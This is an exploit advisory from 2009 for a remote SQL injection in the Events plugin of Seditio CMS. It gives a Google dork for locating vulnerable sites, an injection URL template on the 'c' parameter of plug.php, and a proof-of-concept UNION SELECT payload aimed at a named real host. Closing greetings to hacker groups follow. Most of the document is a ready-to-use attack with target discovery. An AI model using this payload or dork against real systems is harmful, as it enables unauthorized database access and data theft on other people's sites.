The Seditio CMS Events plugin suffers from a remote SQL injection vulnerability.
78361086c2c1b22e6e75e6b1f7bf316faafea3b834e81887b6f613b9f1070294
[+]=================================================================[+]
[x]Title : Seditio Events Remote SQL Injection
Seditio Events Plugin Remote SQL Injection
[x]Software : Seditio CMS
[x]Vendor : www.neocrome.ne
[x]Date : 17 April 2009 ( Indonesia )
[x]Author : OoN_Boy
[x]Contact : oon.boy9@gmail.com
[x]Blog : http://oonboy.blogspot.com
[+]=================================================================[+]
[x] Google Dork
"Powered by Seditio"
[+]=================================================================[+]
[x] Exploit
http://[site]/[path]/plug.php?e=events&f=old&c=all' [SQL]/*
[+]=================================================================[x]
[x]Poc
http://thespider.neocrome.org/plug.php?e=events&f=old&c=all' union select 1,2,3,4,5,version(),7,8,9,0,1,2,3/*
[+]=================================================================[+]
[x] Special Greetz
www.BatamHacker.or.id www.MainHack.com - www.ServerIsDown.org -
Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot,
xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem,
Dan buat semuanya yg ga bisa di sebut satu²
[+]=================================================================[+]